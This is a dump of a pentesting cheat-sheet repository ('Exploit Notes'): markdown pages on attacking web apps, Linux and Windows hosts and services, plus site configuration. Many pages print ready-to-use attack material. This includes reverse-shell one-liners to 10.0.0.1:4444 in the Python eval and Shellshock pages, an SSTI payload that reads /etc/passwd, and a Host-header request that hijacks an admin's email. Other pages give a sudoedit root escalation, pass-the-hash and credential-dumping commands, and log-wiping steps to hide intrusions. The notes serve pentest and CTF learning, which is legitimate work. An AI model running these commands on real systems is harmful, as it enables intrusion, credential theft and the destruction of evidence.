``` 13 | 14 | Below is a Python script to derive a key from a password with scrypt. 15 | 16 | ```python 17 | from Crypto.Protocol.KDF import scrypt 18 | from Crypto.Random import get_random_bytes 19 | 20 | password = b'secret' 21 | salt = get_random_bytes(16) 22 | key = scrypt(password, salt, 16, N=2**14, r=8, p=1) 23 | print(f"key: {key.hex()}") 24 | ``` 25 | 26 | ## References 27 | 28 | - [PyCryptdome](https://pycryptodome.readthedocs.io/en/latest/src/protocol/kdf.html#scrypt) 29 | -------------------------------------------------------------------------------- /docs/exploit/web/codiad.md: -------------------------------------------------------------------------------- 1 | # Codiad Pentesting 2 | 3 | Codiad is a web-based IDE framework. 4 | 5 | ## Default Credentials 6 | 7 | ```sh 8 | # Docker image - https://hub.docker.com/r/bitnami/codiad 9 | user:bitnami 10 | ``` 11 | 12 | ## Enumeration 13 | 14 | ```bash 15 | # Get current directory in the system 16 | /components/project/controller.php?action=get_current 17 | ``` 18 | 19 | ## Remote Code Execution (RCE) v2.8.4 20 | 21 | ```bash 22 | wget https://www.exploit-db.com/exploits/49705 -O exploit.py 23 | 24 | # Linux 25 | python3 exploit.py https://example.com/ admin admin 4444 linux 26 | # Windows 27 | python3 exploit.py https://example.com/ admin admin 4444 windows 28 | ``` 29 | 30 | ## References 31 | 32 | - [Exploit DB](https://www.exploit-db.com/exploits/49705) -------------------------------------------------------------------------------- /docs/exploit/web/tool/burpsuite-troubleshooting.md: -------------------------------------------------------------------------------- 1 | # Burp Suite Troubleshooting 2 | 3 | This article might be able to fix the problems of Burp Suite. 4 | 5 | ## Fix Error “Failed to connect to x.x.x.x:443” 6 | 7 | If we try to HTTP access rather than HTTPS, This error occurs because the Burp’s embedded browser uses secure connections automatically by default. 8 | 9 | If we got the error, we may be able to solve the problem by the following methods: 10 | 11 | 1. In the embedded browser, open Settings by clicking on three dots menu icon. 12 | 2. Once Settings screen opens, go to “Privacy and security” → “Security”. 13 | 3. In “Advanced” section, uncheck “Always use secure connections” then close the Settings. 14 | 4. Enter the desired URL including “http://”. **If all goes well, we may be able to access it.** -------------------------------------------------------------------------------- /docs/exploit/archives/7z-password-cracking.md: -------------------------------------------------------------------------------- 1 | # 7z Password Cracking 2 | 3 | If a 7z file is protected with password, we can crack the password. 4 | 5 | ## Crack 6 | 7 | ### 1. Convert to Hash 8 | 9 | First we need to convert the `.7z` file to hash. 10 | 11 | ```sh 12 | 7z2john example.7z > hash.txt 13 | # or 14 | /usr/share/john/7z2john.pl example.7z > hash.txt 15 | ``` 16 | 17 | If we got the error “`Can't locate Compress/Raw/Lzma.pm in @INC`...”, we need to install `libcompress-raw-lzma-perl` package so try: 18 | 19 | ```bash 20 | sudo apt install libcompress-raw-lzma-perl 21 | ``` 22 | 23 | ### 2. Crack the Hash 24 | 25 | Now we can crack the hash with one of the commands below: 26 | 27 | ```sh 28 | john --wordlist=wordlist.txt hash.txt 29 | # or 30 | hashcat -m 11600 hash.txt wordlist.txt 31 | ``` 32 | -------------------------------------------------------------------------------- /docs/exploit/web/cms/cockpit.md: -------------------------------------------------------------------------------- 1 | # Cockpit CMS Pentesting 2 | 3 | Cockpit CMS is a content management system for publishing contents. 4 | 5 | ## Enumeration & Remote Code Execution (RCE) & Reverse Shell 6 | 7 | ```bash 8 | # Reset password (CVE-2020-35847) 9 | msf> use exploit/multi/cockpit_cms_rce 10 | msf> set USER admin 11 | msf> run 12 | ``` 13 | 14 | ## Version Detection 15 | 16 | Cockpit CMS version is displayed as the value of “data-version” attribute in html tag. 17 | 18 | ```bash 19 | 20 | ``` 21 | 22 | ## Common Directories 23 | 24 | ```bash 25 | /auth/check # We can enumerate users using the path 26 | /auth/forgotpassword 27 | /auth/index 28 | /auth/login 29 | /auth/requestreset # We can enumerate users using the path 30 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/browser/firefox.md: -------------------------------------------------------------------------------- 1 | # FireFox Credentials Dumping 2 | 3 | The `.mozilla` directory contains a firefox directory that stores credentials. 4 | We may dump the credentials and escalate privilege using them. 5 | 6 | ## Investigation 7 | 8 | If there is a `.mozilla/firefox` directory in some user's home directory, we can dump credentials. So check this directory: 9 | 10 | ```sh 11 | ls -al /home//.mozilla/ 12 | ``` 13 | 14 | ## Dump Passwords from Firefox Profile 15 | 16 | To crack it, use [firefox_decrypt](https://github.com/unode/firefox_decrypt): 17 | 18 | ```sh 19 | python3 firefox_decrypt.py .mozilla/firefox/ 20 | ``` 21 | 22 | If we’ll be asked the master password and we don’t know it, try common passwords. 23 | 24 | ```txt 25 | admin 26 | password 27 | password1 28 | password123 29 | root 30 | ``` -------------------------------------------------------------------------------- /docs/exploit/email/pop.md: -------------------------------------------------------------------------------- 1 | # POP (Post Office Protocol) Pentesting 2 | 3 | Post Office Protocol is an application-layer protocol used by email clients. POP3 is a commonly used version. Default ports are 110, 995. 4 | 5 | ## Enumeration 6 | 7 | ```bash 8 | nmap --script "pop3-capabilities or pop3-ntlm-info" -p 110 9 | ``` 10 | 11 | ## Connect 12 | 13 | ```bash 14 | nc 110 15 | # or 16 | telnet 110 17 | ``` 18 | 19 | ## Commands 20 | 21 | ```bash 22 | # Login 23 | USER 24 | PASS 25 | 26 | # Number and total size of all messages 27 | STAT 28 | # List messages and size 29 | LIST 30 | # Retrieve the message of given number 31 | RETR 32 | # Delete the message of given number 33 | DELE 34 | # Reset the mailbox 35 | RSET 36 | # Exit the mail server 37 | QUIT 38 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/host-header-attack.md: -------------------------------------------------------------------------------- 1 | # Host Header Attack 2 | 3 | ## Abuse Connection State 4 | 5 | If the web server validates only the first request, we may be able to exploit the second request by keeping the connection and changing the **Host** header to the internal page. 6 | 7 | ### 1. Send the First Request 8 | 9 | ```bash 10 | GET / HTTP/2 11 | Host: example.com 12 | ... 13 | Connection: keep-alive 14 | 15 | ``` 16 | 17 | ### 2. Send the Second Request. 18 | 19 | ```bash 20 | POST /admin/change-email HTTP/2 21 | Host: 192.168.0.1 22 | 23 | email=admin@example.com&new_email_1=attacker@evil.com&new_email_2=attacker@evil.com 24 | ``` 25 | 26 | As a result, we may be able to change the admin's email to arbitrary email. 27 | 28 | ## References 29 | 30 | - [PortSwigger](https://portswigger.net/web-security/host-header/exploiting) -------------------------------------------------------------------------------- /docs/exploit/cryptography/math/exponentiation.md: -------------------------------------------------------------------------------- 1 | Exponentiation 2 | 3 | ## Basic 4 | 5 | We can calculate the exponentiation using **'\*\*'** operator in Python. 6 | 7 | ```python 8 | 2 ** 4 9 | # 16 10 | 11 | 6 ** 8 12 | # 1679616 13 | ``` 14 | 15 | ## Using Pow Method in Python 16 | 17 | The **`pow`** method can be used for the exponentiation. 18 | 19 | ```python 20 | pow(2, 4) 21 | # 2 ** 4 = 16 22 | ``` 23 | 24 | ### Modular Exponentiation 25 | 26 | In addition, we can find the remainder of dividing a rased value by a specific number. 27 | This may be sometimes used to find the secret key in **key derivation functions**, etc. 28 | 29 | ```python 30 | pow(2, 4, 6) 31 | # 2 ** 4 % 6 = 4 32 | ``` 33 | 34 | ## Inverse 35 | 36 | ```python 37 | from Crypto.Util.number import inverse 38 | 39 | inverse(3, 10) # 7 40 | pow(3, -1, 10) # 7 41 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/http-rate-limit-bypass.md: -------------------------------------------------------------------------------- 1 | # HTTP Rate Limit Bypass 2 | 3 | The 429 “Too Many Requests” response in HTTP header occurs when the client has sent too many requests in a given amount of time (rate limiting). That is because the server limits the number of requests. However, we may be able to bypass this restriction. 4 | 5 | ## Bypass 6 | 7 | We may be able to bypass the rate limiting by adding one of the following headers and change the IP per request. 8 | Sometimes, we need to add multiple headers. 9 | 10 | ```bash 11 | X-Forwarded: 12 | X-Forwarded-For: 13 | X-Forwarded-Host: 14 | X-Client-IP: 15 | X-Remote-IP: 16 | X-Remote-Addr: 17 | X-Host: 18 | X-Originating-IP: 19 | ``` 20 | 21 | ## References 22 | 23 | - [InfoSec Writeups](https://infosecwriteups.com/bypassing-rate-limit-like-a-pro-5f3e40250d3c) -------------------------------------------------------------------------------- /docs/exploit/web/template-engine/jsrender-template-injection.md: -------------------------------------------------------------------------------- 1 | # JsRender Template Injection 2 | 3 | JsRender is a light-weight but powerful template engine. It is vulnerable to template injection. 4 | 5 | ## Investigation 6 | 7 | Try to insert arbitrary code into double curly brackets. If the result of the code is reflected in the page, we can inject malicious code in the template. 8 | 9 | ```bash 10 | {{:2*3}} 11 | {{:"test".toString}} 12 | ``` 13 | 14 | ## Exploitation 15 | 16 | ```bash 17 | # XSS 18 | {{:"test".toString.constructor.call({},"alert(1)")}} 19 | # Read local files 20 | {{:"test".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /etc/passwd').toString()")()}} 21 | ``` 22 | 23 | ## References 24 | 25 | - [AppCheck](https://appcheck-ng.com/template-injection-jsrender-jsviews) -------------------------------------------------------------------------------- /docs/exploit/windows/privilege-escalation/login-windows-shell.md: -------------------------------------------------------------------------------- 1 | # Login Windows Shell 2 | 3 | If we have credentials for target Windows system, we can execute commands from Linux machine. 4 | 5 | ## Impacket PsExec 6 | 7 | PsExec gives us an interactive shell on the Windows host. 8 | 9 | ```sh 10 | impacket-psexec username:password@ 11 | # Pass the Hashes 12 | impacket-psexec -hashes abcdef0123456789abcdef0123456789:c2597747aa5e43022a3a3049a3c3b09d username@10.0.0.1 13 | ``` 14 | 15 | ## Impacket WmiExec 16 | 17 | WmiExec uses Windows Management Instrumentation (WMI) to give us an interactive shell on the Windows host. 18 | 19 | ```sh 20 | impacket-wmiexec example.local/username@10.0.0.1 21 | # Pass the Hashes 22 | impacket-wmiexec -hashes abcdef0123456789abcdef0123456789:c2597747aa5e43022a3a3049a3c3b09d example.local/username@10.0.0.1 23 | ``` -------------------------------------------------------------------------------- /docs/exploit/cryptography/tool/pwsafe.md: -------------------------------------------------------------------------------- 1 | # Password Safe Pentesting 2 | 3 | Password Save is a password database utility. We may retrieve passwords for users. 4 | 5 | ## Install PasswordSafe Manager 6 | 7 | Go to the [release page](https://github.com/pwsafe/pwsafe/releases) and download it. 8 | 9 | For example, if you use Debian, download `.deb` package and run the following command: 10 | 11 | ```bash 12 | sudo dpkg -i passwordsafe-debian12-x.x-amd64.deb 13 | ``` 14 | 15 | ## Analyze `.pwsafe3` file 16 | 17 | ```bash 18 | pwsafe example.pwsafe3 19 | ``` 20 | 21 | ## Crack `.pwsafe` Password 22 | 23 | If the password is required to open `.pwsafe` file in the PasswordSafe manger, we might be able to crack the password of the `.pwsafe` file as below: 24 | 25 | ```bash 26 | pwsafe2john example.pwsafe3 > hash.txt 27 | john --wordlist=wordlist.txt hash.txt 28 | ``` -------------------------------------------------------------------------------- /mkdocs.yml: -------------------------------------------------------------------------------- 1 | site_name: Exploit Notes 2 | site_url: https://exploit-notes.hdks.org 3 | repo_url: https://github.com/hdks-bug/exploit-notes 4 | theme: 5 | name: material 6 | custom_dir: overrides 7 | favicon: assets/icon.png 8 | logo: assets/icon-nobg.png 9 | font: 10 | text: Noto Sans 11 | language: en 12 | palette: 13 | scheme: slate 14 | primary: black 15 | accent: deep purple 16 | features: 17 | - header.autohide 18 | - navigation.top 19 | - content.code.copy 20 | markdown_extensions: 21 | - pymdownx.highlight: 22 | anchor_linenums: true 23 | line_spans: __span 24 | pygments_lang_class: true 25 | - pymdownx.inlinehilite 26 | - pymdownx.snippets 27 | - pymdownx.superfences 28 | plugins: 29 | - search 30 | - social 31 | extra: 32 | analytics: 33 | provider: google 34 | property: G-RR6XYHYTQ9 -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/sudo/sudoedit.md: -------------------------------------------------------------------------------- 1 | # Sudoedit Privilege Escalation 2 | 3 | The `sudoedit` command might be vulnerable to privilege escalation. 4 | 5 | ## Investigation 6 | 7 | ```bash 8 | sudo -l 9 | 10 | (root) sudoedit /opt/example.txt 11 | ``` 12 | 13 | If we can execute sudoedit command as root, we might be able to escalate the privileges with some version. 14 | 15 | ## Exploitation ([CVE-2023-22809](https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf)) 16 | 17 | ```bash 18 | export EDITOR="vim -- /etc/sudoers" 19 | sudoedit /opt/example.txt 20 | ``` 21 | 22 | In vim editor, add the following line in **`/etc/sudoers`**. 23 | Assume the current username is “john” 24 | 25 | ```bash 26 | john ALL=(ALL:ALL) ALL 27 | ``` 28 | 29 | After that, we can escalate to root privilege. 30 | 31 | ```bash 32 | sudo su root 33 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/dom-cloberring.md: -------------------------------------------------------------------------------- 1 | # DOM Cloberring 2 | 3 | ## Basic Exploitation 4 | 5 | If the website adds the JavaScript code into the DOM when loading page as below, 6 | 7 | ```jsx 8 | window.onload = function() { 9 | let someObj = window.someObj || {}; 10 | let script = document.createElement('script'); 11 | script.src = someObj.url; 12 | document.body.appendChild(script); 13 | } 14 | ``` 15 | 16 | We may manipulate this **`someObj`** and override the properties (**`url`** here) using **`anchor`** elements, then we can execute arbitrary JavaScript code. 17 | For example, insert the following code in the comment, search, etc. in the target website. 18 | 19 | ```html 20 | 21 | ``` 22 | 23 | ## References 24 | 25 | - [DOM Clobbering](https://portswigger.net/web-security/dom-based/dom-clobbering) 26 | -------------------------------------------------------------------------------- /docs/exploit/game/chess-game-cheating.md: -------------------------------------------------------------------------------- 1 | # Chess Game Cheating 2 | 3 | ## FEN Manipulation 4 | 5 | Forsyth-Edwards Notation (FEN) is a standard notation for describing a particular position of a chess game. The file format is `.fen`. 6 | The [FEN Generator](http://www.netreal.de/Forsyth-Edwards-Notation/index.php) allows us to create a custom FEN string. 7 | For example, below is that our all staffs are queens except the king, and that of the enemy are pawns except the king. 8 | 9 | ```bash 10 | pppkpppp/pppppppp/8/8/8/8/QQQQQQQQ/QQQQKQQQ 11 | # or 12 | ppppkppp/pppppppp/8/8/8/8/QQQQQQQQ/QQQQKQQQ w KQkq - 0 1 13 | ``` 14 | 15 | Then paste the FEN string to `.fen` file. 16 | Or paste in the [pastebin](https://pastebin.com/) and click “raw” button then we can get the URL link of the raw mode. 17 | This file can be able to be used for uploading, manipulating in the target website. -------------------------------------------------------------------------------- /docs/exploit/container/docker/docker-registry.md: -------------------------------------------------------------------------------- 1 | # Docker Registry Pentesting 2 | 3 | Docker Registry is a steteless, highly scalable server side application that stores and lets you distribute Docker images. A default port is 5000. 4 | 5 | ## Endpoints 6 | 7 | ```bash 8 | /v2/_catalog 9 | /v2//tags/list 10 | # We can download the manifest given tag. 11 | /v2//manifests/ 12 | ``` 13 | 14 | ## Extract Layers 15 | 16 | If we download the manifest with the above, see the content and blobsums (sha256:abcd...) in fsLayers. 17 | 18 | ```bash 19 | curl -so 1.tar https://example.com:5000/v2//blobs/sha256:abcd... 20 | tar -xvf 1.tar 21 | ``` 22 | 23 | After extracting tar files, investigate files or directories to find the sensitive information. 24 | 25 | ## References 26 | 27 | - [tbhaxor](https://tbhaxor.com/exploiting-insecure-docker-registry/) 28 | -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/python-eval.md: -------------------------------------------------------------------------------- 1 | # Python Eval Code Execution 2 | 3 | The Python's `eval()` method is vulnerable to arbitrary code execution. 4 | 5 | ## Investigation 6 | 7 | ```py 8 | eval(text) 9 | eval(f"5 + {num}") 10 | ``` 11 | 12 | If the Python script allows us to input some value to the **"text"** variable, we can inject arbitrary code. 13 | 14 | ## Arbitrary Code Execution 15 | 16 | Most of the time, we need to bypass another expression to execute our desired command. 17 | 18 | ```html 19 | __import__('os').system('id') 20 | 21 | 22 | ),__import__('os').system('id') 23 | '),__import__('os').system('id') 24 | },__import__('os').system('id') 25 | ),__import__('os').system('id')# 26 | ``` 27 | 28 | ### Reverse Shell 29 | 30 | ```html 31 | __import__('os').system('bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"') 32 | ``` -------------------------------------------------------------------------------- /docs/exploit/machine-learning/computer-vision/image-recognition-bypass.md: -------------------------------------------------------------------------------- 1 | # Image Recognition Bypass for Machine Learning 2 | 3 | We can trick image recognizer or classifier by adding filters or obfuscating an image. 4 | 5 | ## Blurring 6 | 7 | ```python 8 | from PIL import Image 9 | from PIL import ImageFilter 10 | 11 | img = Image.open("example.png") 12 | 13 | # Box blur 14 | img1 = img.filter(ImageFilter.BoxBlur(5)) 15 | # Gaussian blur 16 | img2 = img.filter(ImageFilter.GaussianBlur(5)) 17 | # Median filter 18 | img3 = img.filter(ImageFilter.MedianFilter(size=5)) 19 | # Rank filter 20 | img4 = img.filter(ImageFilter.RankFilter(size=13, rank=5)) 21 | ``` 22 | 23 | ## Cropping/Rotating 24 | 25 | ```python 26 | from PIL import Image 27 | from PIL import ImageFilter 28 | 29 | img = Image.open("example.png") 30 | img = img.resize((512, 512)) 31 | 32 | img1 = img.crop((0, 0, 300, 280)).rotate(-60) 33 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/apache-activemq.md: -------------------------------------------------------------------------------- 1 | # Apache ActiveMQ Pentesting 2 | 3 | Apache ActiveMQ is a message broker written in Java together with a full Java Message Service client. 4 | 5 | ## Default Credentials 6 | 7 | ```bash 8 | admin:admin 9 | ``` 10 | 11 | ## Interaction with MQTT 12 | 13 | If the MQTT server is runnong on the target system, we can subscribe/publish to a topic in ActiveMQ using MQTT client. 14 | 15 | ### Subscribe to a Topic 16 | 17 | ```bash 18 | # -h: Host 19 | # -t: Topic name 20 | # -V: MQTT protocol version (5, 31, 311) 21 | mosquitto_sub -h example.com -u admin -P admin -t 'example/topic' -V 31 22 | ``` 23 | 24 | ## Web Shell by File Upload JSP 25 | 26 | ActiveMQ is vulnerable to web shell via file upload an arbitrary JSP file. 27 | 28 | ```bash 29 | msfconsole 30 | msf> use exploit/multi/http/apache_activemq_upload_jsp 31 | msf> set ... 32 | msf> run 33 | meterpreter> shell 34 | ``` -------------------------------------------------------------------------------- /docs/exploit/network/arp-spoofing.md: -------------------------------------------------------------------------------- 1 | # ARP (Address Resolution Protocol) Spoofing 2 | 3 | ARP is used to find another computer’s MAC address based on its IP address. 4 | 5 | ## Basic Flow 6 | 7 | 1. **Check Interface and Gateway IP Address** 8 | 9 | ```sh 10 | # Interfaces 11 | ip addr 12 | 13 | # Default gateway 14 | ip route list 15 | ``` 16 | 17 | 2. **Scan the Network to Find Target IP** 18 | 19 | ```sh 20 | nmap -sP /24 21 | nmap -sP /16 22 | ``` 23 | 24 | 3. **Enable IP Forwarding** 25 | 26 | ```sh 27 | # Allow all forwading in the LAN 28 | # -A: append rules 29 | # -i: interface 30 | # -j: jump 31 | iptables -A FORWARD -i eth0 -j ACCEPT 32 | ``` 33 | 34 | ## Find MAC Address 35 | 36 | ```sh 37 | cat /sys/class/net/eth0/address 38 | cat /sys/class/net/enp0s3/address 39 | cat /sys/class/net/tun0/address 40 | ``` -------------------------------------------------------------------------------- /docs/exploit/web/framework/angular.md: -------------------------------------------------------------------------------- 1 | # Angular Pentesting 2 | 3 | AngularJS is a web application framework. 4 | 5 | ## HTML Attributes 6 | 7 | If a website uses AngularJS framework, the nodes have a “ng-apps” attribute. So you can check it in a HTML source code. 8 | 9 | ```html 10 |
11 | ``` 12 | 13 | ## Server-Side Template Injection (SSTI) 14 | 15 | ```bash 16 | {{2*3}} 17 | {{$on.constructor('alert("test")')()}} 18 | {{constructor.constructor('alert("test")')()}} 19 | 20 | 21 |
22 | ``` 23 | 24 | It worth testing to bypass sanitizing as below. 25 | 26 | ```bash 27 | # Remove one-pair braces 28 | {2*3} 29 | 30 | # Remove all braces 31 | 2*3 32 | 33 | # Add additional braces 34 | {{{2*3}}} 35 | ``` -------------------------------------------------------------------------------- /docs/exploit/blockchain/smart-contract/contract-address-recovery.md: -------------------------------------------------------------------------------- 1 | # Contract Address Recovery 2 | 3 | ## Create a Contract for Recovery Address 4 | 5 | This contract can compute the contract address which has been lost. 6 | 7 | ```js 8 | // SPDX-License-Identifier: MIT 9 | pragma solidity ^0.8.0; 10 | 11 | contract ContractRecovery { 12 | 13 | constructor(address _creatorAddress) { 14 | address lostAddress = address(uint160(uint256(keccak256(abi.encodePacked(bytes1(0xd6), bytes1(0x94), address(_creatorAddress), bytes1(0x01)))))); 15 | // some code here ... 16 | } 17 | } 18 | ``` 19 | 20 | Another way is to use [Etherscan](https://etherscan.io/) transaction history. 21 | 22 | ## References: 23 | 24 | - [StackExchange](https://ethereum.stackexchange.com/questions/760/how-is-the-address-of-an-ethereum-contract-computed) 25 | - [Dixitaditya](https://blog.dixitaditya.com/ethernaut-level-17-recovery) -------------------------------------------------------------------------------- /docs/exploit/machine-learning/data-processing/dimensionality-reduction.md: -------------------------------------------------------------------------------- 1 | # Dimensionality Reduction for Machine Learning 2 | 3 | Dimensionality Reduction is a data processing to make machine learning models easier to train. 4 | 5 | ## PCA (Principal Component Analysis) 6 | 7 | Reference: [https://www.kaggle.com/code/jonbown/ai-ctf-submissions?scriptVersionId=105606691&cellId=42](https://www.kaggle.com/code/jonbown/ai-ctf-submissions?scriptVersionId=105606691&cellId=42) 8 | 9 | we use **PCA** to find the optimal dimensions for data. 10 | 11 | ```python 12 | import numpy as np 13 | from sklearn.decomposition import PCA 14 | 15 | data = np.load("example.npy") 16 | 17 | for i in range(1, 10): 18 | pca = PCA(n_components=i) 19 | principal_components = pca.fit_transform(data) 20 | print(pca.explained_variance_ratio_) 21 | ``` 22 | 23 | ## References 24 | 25 | - [Kaggle](https://www.kaggle.com/competitions/ai-village-ctf) -------------------------------------------------------------------------------- /docs/exploit/web/code-deobfuscation.md: -------------------------------------------------------------------------------- 1 | # Code Deobfuscation 2 | 3 | This technique make a obfuscated code (such as JavaScript) to be understandable. 4 | 5 | ## Deobfuscation 6 | 7 | - **JavaScript** 8 | 9 | - **[JavaScript Deobfuscator](https://deobfuscate.io/)** 10 | 11 |
12 | 13 | ## Obfuscation 14 | 15 | 1. **JavaScript** 16 | 17 | - **Manual Obfuscation** 18 | 19 | 1. Access [https://obfuscator.io/](https://obfuscator.io/). 20 | 21 | 2. Change “String Array Encoding” to “Base64”. 22 | 23 | 3. Paste JavaScript code. 24 | 25 | 4. Click "Obfuscate". 26 | 27 | 5. Try running it on [https://jsconsole.com/](https://jsconsole.com/). 28 | 29 | - **Use Online Tools** 30 | 31 | - **[JSFuck](http://www.jsfuck.com/)** 32 | 33 | - **[jjencode](https://utf-8.jp/public/jjencode.html)** 34 | 35 | - **[aaencode](https://utf-8.jp/public/aaencode.html)** -------------------------------------------------------------------------------- /.github/workflows/ci.yml: -------------------------------------------------------------------------------- 1 | name: ci 2 | on: 3 | push: 4 | branches: 5 | - master 6 | - main 7 | permissions: 8 | contents: write 9 | jobs: 10 | deploy: 11 | runs-on: ubuntu-latest 12 | steps: 13 | - uses: actions/checkout@v4 14 | - name: Configure Git Credentials 15 | run: | 16 | git config user.name github-actions[bot] 17 | git config user.email 41898282+github-actions[bot]@users.noreply.github.com 18 | - uses: actions/setup-python@v5 19 | with: 20 | python-version: 3.x 21 | - run: echo "cache_id=$(date --utc '+%V')" >> $GITHUB_ENV 22 | - uses: actions/cache@v4 23 | with: 24 | key: mkdocs-material-${{ env.cache_id }} 25 | path: ~/.cache 26 | restore-keys: | 27 | mkdocs-material- 28 | - run: pip install mkdocs-material "mkdocs-material[imaging]" 29 | - run: mkdocs gh-deploy --force -------------------------------------------------------------------------------- /docs/exploit/network/firewall.md: -------------------------------------------------------------------------------- 1 | # Firewall 2 | 3 | It's a network security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules. 4 | 5 | ## Status 6 | 7 | ```sh 8 | ufw status 9 | ufw status verbose 10 | ``` 11 | 12 | ## Enable/Disable the Firewall 13 | 14 | ```sh 15 | ufw enable 16 | 17 | ufw disable 18 | ``` 19 | 20 | ## Set Default Policies 21 | 22 | ```sh 23 | # Allow all 24 | ufw default ALLOW 25 | 26 | # Deny all 27 | ufw default DENY 28 | ``` 29 | 30 | ## Rules 31 | 32 | - **Allow** 33 | 34 | ```sh 35 | ufw allow 22 36 | ufw allow 22/tcp 37 | ufw allow 80 38 | ufw allow 80/tcp 39 | 40 | # Allow the given ip address access to port 22 for all protocols 41 | ufw allow from to any port 22 42 | ``` 43 | 44 | - **Deny** 45 | 46 | ```sh 47 | ufw deny 22 48 | ufw deny 22/tcp 49 | ufw deny 80 50 | ufw deny 80/tcp 51 | ``` -------------------------------------------------------------------------------- /docs/exploit/network/redos.md: -------------------------------------------------------------------------------- 1 | # ReDoS (Regular Expression Denial of Service) 2 | 3 | ReDOS is an attack method to compromise the Regex vulnerabilities which evaluate arbitrary inputs. 4 | 5 | ## Evil (Vulnerable) Regex 6 | 7 | ```html 8 | (a+)+ 9 | ([a-zA-Z]+)* 10 | (a|aa)+ 11 | (a|a?)+ 12 | (.*a){x} for x \> 10 13 | ^(([a-z])+.)+[A-Z]([a-z])+$ 14 | 15 | 16 | /^([a-zA-Z0-9])(([\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$/ 17 | ``` 18 | 19 | ## Malicious Input 20 | 21 | If a target website validates user input with the above vulnerable Regex, we may be able to compromise the target system by the following malicious input: 22 | 23 | ```bash 24 | aaaaaaaaaaaaaaaaaaaaaaaa! 25 | ``` 26 | 27 | ## References 28 | 29 | - [OWASP](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) -------------------------------------------------------------------------------- /docs/exploit/linux/post-exploitation/cover-your-tracks.md: -------------------------------------------------------------------------------- 1 | # Cover Your Tracks in Linux 2 | 3 | After exploitation in Linux system, attackers want to erase their activities and be undetectable. 4 | 5 | ## Clear History 6 | 7 | ```bash 8 | unset HISTORY 9 | echo '' > ~/.bash_history 10 | echo '' > /root/.bash_history 11 | history -c 12 | export HISTSIZE=0 13 | unset HISTFILE 14 | ``` 15 | 16 | ## Clear Logs 17 | 18 | ```bash 19 | # Shrink the size of log files with `truncate -s 0` 20 | truncate -s 0 /var/log/auth.log 21 | echo '' > /var/log/auth.log 22 | cat /dev/null > /var/log/auth.log 23 | > /var/log/auth.log 24 | dd if=/dev/null of=/var/log/auth.log 25 | shred /var/log/auth.log 26 | ``` 27 | 28 | ## References 29 | 30 | - [Nullbyte](https://null-byte.wonderhowto.com/how-to/clear-logs-bash-history-hacked-linux-systems-cover-your-tracks-remain-undetected-0244768/) 31 | - [PopLabSec](https://www.poplabsec.com/how-to-cover-your-tracks-on-linux/) 32 | -------------------------------------------------------------------------------- /docs/exploit/windows/privilege-escalation/spn-jacking.md: -------------------------------------------------------------------------------- 1 | # SPN-Jacking 2 | 3 | If the current user has a right to write the SPN of another user, we can achieve lateral movement or privilege escalation. 4 | 5 | ## Exploit 6 | 7 | ### 1. Set SPN and Get the Hash of the Service Ticket 8 | 9 | ```bash 10 | # 1. Import PowerView module 11 | . .\PowerView.ps1 12 | 13 | # 2. Set SPN 14 | Set-DomainObject -Identity -SET @{serviceprincipalname='evil/evil'} 15 | 16 | # 3. Request sercice ticket 17 | Get-DomainSPNTicket -SPN evil/evil 18 | ``` 19 | 20 | ### 2. Crack the Hash 21 | 22 | After that, we retrieve the hash of the ticket, so crack it on your local machine: 23 | 24 | ```bash 25 | # -m 13100: Replace it with the appropriate number depending on the algorithm. 26 | hashcat -a 0 -m 13100 hash.txt wordlist.txt 27 | ``` 28 | 29 | ## References 30 | 31 | - [The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/spn-jacking) -------------------------------------------------------------------------------- /docs/exploit/web/cacti.md: -------------------------------------------------------------------------------- 1 | # Cacti Pentesting 2 | 3 | Cacti is a web-based network monitoring, performance, fault and configuration management framework designed as a front-end application. 4 | 5 | ## Default Credentials 6 | 7 | ```bash 8 | admin:admin 9 | ``` 10 | 11 | ## Common Directories 12 | 13 | ```bash 14 | /include/config.php 15 | ``` 16 | 17 | ## Remote Code Execution (RCE) CVE-2022-46169 18 | 19 | Reference: [https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/](https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/) 20 | 21 | ```bash 22 | msfconsole 23 | msf> use exploit/linux/http/cacti_unauthenticated_cmd_injection 24 | msf> (set options...) 25 | msf> run 26 | ``` 27 | 28 | Also we can refer to [Exploit DB](https://www.exploit-db.com/exploits/51166). 29 | 30 | ## References 31 | 32 | - [Pentest Tools](https://pentest-tools.com/vulnerabilities-exploits/cacti-remote-code-execution_CVE-2022-46169) -------------------------------------------------------------------------------- /docs/exploit/web/cgi.md: -------------------------------------------------------------------------------- 1 | # CGI Pentesting 2 | 3 | CGI (Common Gateway Interface) is a standard protocol that enables web servers to interact with external programs, typically to generate dynamic web content or handle web form submissions. If there is /cgi-bin/ directory in the website, we may be able to execute arbitrary OS command. 4 | 5 | ## Enumeration CGI Scripts 6 | 7 | ```bash 8 | ffuf -u https://example.com/cgi-bin/FUZZ.cgi -w wordlist.txt 9 | ``` 10 | 11 | ## Shellshock 12 | 13 | Shellshock is the vulnerability of bash v1.0.3-4.3 that allows users to execute arbitrary commands. 14 | If we found the CGI script under **`/cgi-bin/`**, modifying HTTP header to remote code execution. 15 | 16 | ```bash 17 | GET /cgi-bin/example.cgi HTTP/1.1 18 | 19 | User-Agent: () { :; }; /bin/bash -c "sleep 5" 20 | Cookie: () { :; }; /bin/bash -c "sleep 5" 21 | 22 | # Reverse Shell 23 | User-Agent: () { :; }; /bin/bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1" 24 | ``` -------------------------------------------------------------------------------- /docs/exploit/blockchain/smart-contract/denial-of-service-attack.md: -------------------------------------------------------------------------------- 1 | # DoS Attack for Smart Contract 2 | 3 | We can denial the 